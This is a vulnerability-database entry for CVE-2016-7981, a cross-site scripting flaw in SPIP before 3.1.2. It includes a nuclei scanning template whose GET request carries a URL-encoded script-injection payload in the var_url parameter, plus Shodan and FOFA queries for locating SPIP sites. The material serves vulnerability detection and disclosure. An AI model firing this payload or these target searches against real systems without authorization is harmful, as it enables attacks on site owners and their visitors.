SPIP <3.1.2 - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType

nuclei🔗 github.com👁 155 Views

SPIP 3.1.2 - Cross-Site Scripting vulnerability in valider_xml.php allows remote attackers to inject arbitrary web script or HTML via var_url parameter in valider_xml action. Successful exploitation could allow execution of arbitrary script code in victim's browser. Upgrade to version 3.1.2 or later to mitigate

Reporter	Title	Published	Views	Family All 18
0day.today	SPIP 3.1.2 Cross Site Scripting Vulnerability	20 Oct 201600:00	–	zdt
Circl	CVE-2016-7981	19 Oct 201620:44	–	circl
CNVD	SPIP cross-site scripting vulnerability (CNVD-2016-09663)	12 Oct 201600:00	–	cnvd
CVE	CVE-2016-7981	18 Jan 201717:00	–	cve
Cvelist	CVE-2016-7981	18 Jan 201717:00	–	cvelist
Debian	[SECURITY] [DLA 695-1] spip security update	2 Nov 201622:00	–	debian
Debian CVE	CVE-2016-7981	18 Jan 201717:00	–	debiancve
Tenable Nessus	Debian DLA-695-1 : spip security update	3 Nov 201600:00	–	nessus
Tenable Nessus	Linux Distros Unpatched Vulnerability : CVE-2016-7981	25 Aug 202500:00	–	nessus
NVD	CVE-2016-7981	18 Jan 201717:59	–	nvd

Source	Link
core	www.core.spip.net/projects/spip/repository/revisions/23202
core	www.core.spip.net/projects/spip/repository/revisions/23201
core	www.core.spip.net/projects/spip/repository/revisions/23200
nvd	www.nvd.nist.gov/vuln/detail/CVE-2016-7981
openwall	www.openwall.com/lists/oss-security/2016/10/05/17

id: CVE-2016-7981

info:
  name: SPIP <3.1.2 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser.
  remediation: |
    Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability.
  reference:
    - https://core.spip.net/projects/spip/repository/revisions/23202
    - https://core.spip.net/projects/spip/repository/revisions/23201
    - https://core.spip.net/projects/spip/repository/revisions/23200
    - https://nvd.nist.gov/vuln/detail/CVE-2016-7981
    - http://www.openwall.com/lists/oss-security/2016/10/05/17
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-7981
    cwe-id: CWE-79
    epss-score: 0.08216
    epss-percentile: 0.94162
    cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: spip
    product: spip
    shodan-query:
      - http.html:"spip.php?page=backend"
      - cpe:"cpe:2.3:a:spip:spip"
    fofa-query: body="spip.php?page=backend"
  tags: cve2016,cve,xss,spip,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220108f971d1d38c5ac76cdda4775a8dda9b1ca49119e2b0e6491dd8e284d41500c022010d2a722e6a626fb9691d9f18f22cde19fa44d917bc0d6b033dd59dd4b4b46c0:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.8Medium risk

Vulners AI Score6.8

CVSS 24.3

CVSS 36.1

EPSS0.08216